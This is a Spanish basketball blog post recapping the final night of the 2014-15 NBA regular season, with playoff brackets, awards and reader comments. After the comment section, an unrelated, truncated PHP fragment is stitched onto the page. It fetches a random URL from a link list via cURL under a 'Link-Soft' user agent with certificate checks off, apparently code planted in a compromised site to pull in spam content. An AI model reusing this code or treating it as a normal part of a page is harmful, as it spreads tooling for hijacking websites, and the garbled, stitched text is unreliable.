Crónica: Premio para Pelicans y Nets

16 de April de 2015 por Viva_Dirk

La regular season 2014-2015 ya es historia. Se cerró anoche en una jornada con muchas cosas en juego, que desgranaremos en esta crónica estructurada por conferencias. Lo más importante: Pelicans y Nets disputarán los Playoffs en detrimento de OKC Thunder y Pacers. También conocemos ya, obviamente, todos los emparejamientos de los Playoffs que arrancan este fin de semana. Y con prueba gratuita del League Pass disponible, ahí lo dejamos.

CONFERENCIA ESTE

Lucha por la 8ª plaza

Orlando Magic 88 – Brooklyn Nets 101

Victoria basada en un gran último cuarto con un parcial de 13-26 con la que entraban en playoffs en Brooklyn a la espera del partido de los Pacers. Gran actuación de Bogdanovic desde el banco con 28 puntos y una serie de 12 de 17 en tiros, bien secundado por Thaddeus y Joe Johnson; por los Magic 26-11-5 de Vucevic para terminar otra gran temporada a nivel individual. No es que tengamos grandes esperanzas en ellos, pero viendo el nivel del Este tampoco es ningún caramelo un equipo con el talento de los Nets por haber sido lider indiscutible de la conferencia.

Indiana Pacers 83 – Memphis Grizzlies 95

El otro partido donde se decidían los playoffs del Este tenía el inconveniente para los Pacers de que Memphis se jugaba ser quinto o sexto del Oeste. Un partido genial de Marc (33-13) y un acompañamiento de Zach(18-9) bastó para dejar fuera de playoffs a unos Pacers donde solo CJ Miles y George Hill estuvieron a la altura con 26 y 20 puntos respectivamente. Fin a una temporada para Indiana marcada por la lesión de Paul George, al que esperamos ver totalmente recuperado para la 2015-2016.

Otros partidos

En partidos sin ninguna trascendencia para la clasificación Toronto venció a Charlotte por 92-87 en un buen partido de Lowry. Chicago se impuso a Atlanta 91-85 con inexplicables minutadas para Gasol y Butler. Boston ganó en Milwaukee 105-100 con 22 puntos de Gigi Datome. Unos Cavs sin LeBron ganaron en la prórroga 113-108 a unos Wizars sin Wall. Los Pistons ganaron en el Madison 112-90 con una gran actuación de Reggie Jackson. Miami protagonizó una de las anécdotas de la noche con 4 jugadores disputando 48 minutos y otro 41, así ganaron a los Sixers por 105-101 y vimos a Beasley hacer un 34-11-8.

El cuadro de Playoffs de la conferencia Este queda:

Atlanta(1)-Brooklyn(8)

Toronto(4)-Washington(5)

Cleveland(2)-Boston(7)

Chicago(3)-Milwaukee(6)

CONFERENCIA OESTE

Lucha por la 8ª plaza

San Antonio Spurs 103 – New Orleans Pelicans 108

Los Pelicans certificaron su merecida clasificación para Playoffs a lo grande, con una victoria sobre los campeones, que no llegaron al Smoothie King Center de paseo precisamente pero vieron truncada su racha de 11 partidos sin perder y de esta manera cayeron de la 2ª hasta la 6ª posición. El éxito de los Pelicans se basó, como no podía ser de otra manera, en la omnipresente figura de Anthony Davis, alrededor del cual gravitó cuanto ocurrió sobre el parquet. Y no olvidemos a Tyreke Evans, menospreciado con frecuencia pero que coronó su temporada con una actuación extremadamente eficiente. Así, con Davis y Evans a las riendas, el partido se inclinó pronto del lado de los Pelicans, que conservaron ventajas de cerca de 15 puntos durante la mayor parte del encuentro y supieron resistir cuando los Spurs amenazaro con una remontada que nunca llegó a consumarse. Premio, pues, para New Orleans, en forma de primera aparición en Playoffs desde la marcha de Chris Paul, y relativo castigo para los Spurs, a los que tampoco creemos que les preocupe demasiado haber perdido el factor pista para la primera ronda.

Oklahoma City Thunder 138 – Minnesota Timberwolves 113

“No significa nada”. Russell Westbrook se había alzado con el título de máximo anotador de la temporada, una campaña en la que el base de los Thunder ha firmado registros históricos pero cuyos Playoffs verá desde casa. En Minnesota, Westbrook arrasó desde el mismo salto inicial (23 puntos en el primer cuarto) con el objetivo de asegurar un triunfo que, sin embargo, quedó neutralizado por la victoria de los Pelicans. Kanter y Waiters se apuntaron al festival anotador frente al equipo que llegará al sorteo del draft con más probabilidades de hacerse con el primer pick. El triunfo y los casi 140 puntos anotados no esconden el amargo sabor de boca que deja para OKC una campaña de nuevo marcada por las lesiones.

Lucha por la 2ª plaza

Utah Jazz 91 – Houston Rockets 117

La expectativa de una derrota de los Spurs, que jugaban a la misma hora, abrió la puerta del 2º puesto del Oeste a los Rockets, y el equipo dirigido por Kevin McHale se aseguró de no desaprovechar la ocasión. Ante unos Jazz que tampoco parecieron muy interesados en competir, los Rockets jamás fueron por detrás y sentenciaron en el segundo cuarto, cuando su renta se disparó hasta los 30 puntos. James Harden no necesitó ni 30 minutos para obtener su cuarto triple doble de esta regular season y los Rockets encontraron premio a su meritoria temporada con un cruce de Playoffs a priori bastante más favorable que el que le esperaba en caso de ser terceros.

Resto de la jornada

Los Warriors se convirtieron en el décimo equipo de la historia en lograr 67 victorias en una temporada. Anoche superaron a los Nuggets (126-133) en un partido marcado por las rotaciones de ambos entrenadores y por los 25 puntos anotados por Klay Thompson en 16 minutos. Los Mavs ganaron cómodamente a los Blazers (98-114) en un partido entre dos de los pocos equipos que ya conocían su puesto en el cuadro de los Playoffs. Y en el Staples, los Lakers se confirmaron como los peores de la historia con una derrota (122-99) ante los Kings. Atención al backcourt titular de los angelinos: Jabari Brown y Vander Blue.

El cuadro de Playoffs de la conferencia queda así:

Warriors(1) – Pelicans(8)

Blazers(4) – Grizzlies(5) – ventaja campo Grizzlies

Rockets(2) – Mavericks(7)

Clippers(3) – Spurs (6)

PREMIOS

MVP: Sensacional Marc Gasol con 33 puntos (13 de 19 TC), 13 rebotes, 2 robos y 1 tapón, pero no podemos obviar el éxito de Anthony Davis conduciendo a sus Pelicans a Playoffs. Anoche The Brow anotó 31 puntos con 13 rebotes, 2 asistencias, 2 robos y 3 tapones.

Rookie: Gran segunda mitad de temporada la de Zach LaVine, que cerró su campaña rookie con 19 puntos, 13 asistencias, 5 rebotes y 3 robos.

Sorpresa: Es lo que tienen estas fechas, que llega Michael Beasley y firma una de las mejores líneas estadísticas individuales de toda la temporada. 34 puntos, 11 rebotes, 8 asistencias, 2 rebotes y 2 tapones.

Decepción: Dependían de sí mismos los Pacers pero para ganar en una plaza como Memphis hace falta mucho más de gente como David West y Roy Hibbert. Entre ambos aportaron 11 puntos y 8 rebotes, mientras enfrente Gasol y Randolph se combinaban para 51 puntos y 22 rebotes. Y adiós a la temporada para los Pacers.

Mayor esfuerzo en vano: Por una vez, daremos este premio a un jugador que ganó su partido. Si alguien representa el mayor esfuerzo en vano esta temporada es Russell Westbrook, máximo anotador, líder destacadísimo en triples dobles y un auténtico one-man show que ante la lesión de Durant ha elevado su rendimiento a la estratosfera pero se queda a las puertas de los Playoffs. Se despide con 37 puntos, 8 rebotes, 7 asistencias y 2 robos ante los Wolves.

 Top 10

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Una más del inútil de Scott Brooks,el tío debe ser un pelota de cuidao o debe ser como Santa Claus con los jugadores,porque con semejante equipo que se vaya quedando año tras año más lejos del anillo tiene mérito que no lo echen.Y habrá quien se escude en las lesiones,que si,con Durant OK,se meten en playoffs seguramente pero allí con los Warriors como rivales no tenían opción.Un equipo sin defensa (¿hola Brooks?) tiene 0 posibilidades de ser campeón.Aclaro que no es que sea fan de Thunder,pero pa unas pocas fobias personales que tengo,me doy el capricho de desahogar cuando puedo xDD Hoy será un día complicado para ellos,pero de ser ellos no derrocharía mucha lágrima y me pondría manos a la obra porque el año que viene es clave en la franquicia.

    Confiaba en los Pelicans para ganar a los Spurs y mola ver a Davis,con Irving y Love,de novatos a estas alturas.A ver qué talla dan.Omnipotente La Ceja,hoy y toda la temporada,y no hay que olvidar esto.:

    https://www.youtube.com/watch?v=Ei34RqCmRXQ

    Sin esa canasta hoy los PO podrían haber sido distintos

      Citar

  2. Jose Luis dice:
    #2

    Tremenda cagada de los Spurs perder este partido… tendrán que ganar (probablemente) mínimo 3 rondas sin factor cancha para alcanzar el anillo… uf.

    Por otro lado ya tengo ganas de que pateen a los Clippers xD 2-4 o 1-4 le doy

    Abrimos post para porra? 😛

      Citar

  3. tebias dice:
    #3

    Buenos días,

    Tengo una duda y que creo que esta mal aclarada en este blog: Saber si los Bulls o los Raptors se jugaban algo en la última jornada.

    He leído en la anterior crónica que los Bulls iban a quedar primeros por enfrentamientos directos con los Raptors (creo que era 3-1 ), pero un amigo mio de basket americano me ha insistido que no, que en igualdad de partidos ganados y perdidos se prioriza si ha sido líder de la división.

    Pensé que esto era un error de la anterior crónica vuestra, pero vuelvo a leer: “En partidos sin ninguna trascendencia para la clasificación Toronto venció a Charlotte por 92-87 en un buen partido de Lowry. Chicago se impuso a Atlanta 91-85 con inexplicables minutadas para Gasol y Butler.” cuando en realidad si tenía trascendencia, porque Bulls y Toronto se jugaban quedar en mejor posición.

    ¿Me podéis aclarar esto? Muchas gracias, y espero haberme explicado bien.

      Citar

  4. dunc dice:
    #4

    Uffff, no voy a decir que se hayan metido en un lio porque son los Spurs y el lío son ellos para el resto de equipos, pero ese enfrentamiento Clippers vs Spurs es telita. Ya no es tanto la ventaja de campo sino el rival.

    Es una eliminatoria apasionante, a mi también me apetece que se carguen a los Clippers, equipo que no me cae nada bien.

    Mi porra es de 2-4 Spurs!

      Citar

  5. Jose Luis dice:
    #5

    Si tebias, se lo jugaban. De ahí las minutadas de Gasol y Butler para ganar o caer al 4º puesto

      Citar

  6. Ruxixón dice:
    #6

    Secundo moción,¡¡abrimos para porra!! 😛

      Citar

  7. Azabel dice:
    #7

    bueno pelicans a PO, esta para darle un vistazo a la previa no? jajajajajajajajaja

      Citar

  8. Azabel dice:
    #8

      Citar

  9. MagicJohnson32 dice:
    #9

    Ruxixón:
    Secundo moción,¡¡abrimos para porra!! :P

    Veeeenga, vaaaaaaale: http://blog.tjnba.com/2015/04/16/la-porra-de-los-playoffs-2015/

    😉

      Citar

  10. MagicJohnson32 dice:
    #10

    tebias:

    ¿Me podéis aclarar esto? Muchas gracias, y espero haberme explicado bien.

    Sí, sí, correcto, una derrota de los Bulls les podía haber bajado a la 4ª posición por la absurdez esa de los campeones de división. Un error en la crónica de AP (publicada en nba.com y espn, entre muchos otros) nos despistó. ¡Perdona la confusión!

      Citar

  11. Jose Luis dice:
    #11

    Hoy he leído que Curry y Thompson han metido más triples que 5 equipos al completo:

    Wizards, Kings, Grizzlies, Hornets y Wolves.

    Bueno en el caso de Kings o Wolves tampoco es de extrañar creo, incluso Hornets puedo entenderlo.

    Pero Wizards tiene buenos tripleros, y en Grizzlies esto es un desastre, las defensas serán mucho más cerradas contra su dúo interior si encima no meten triples…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>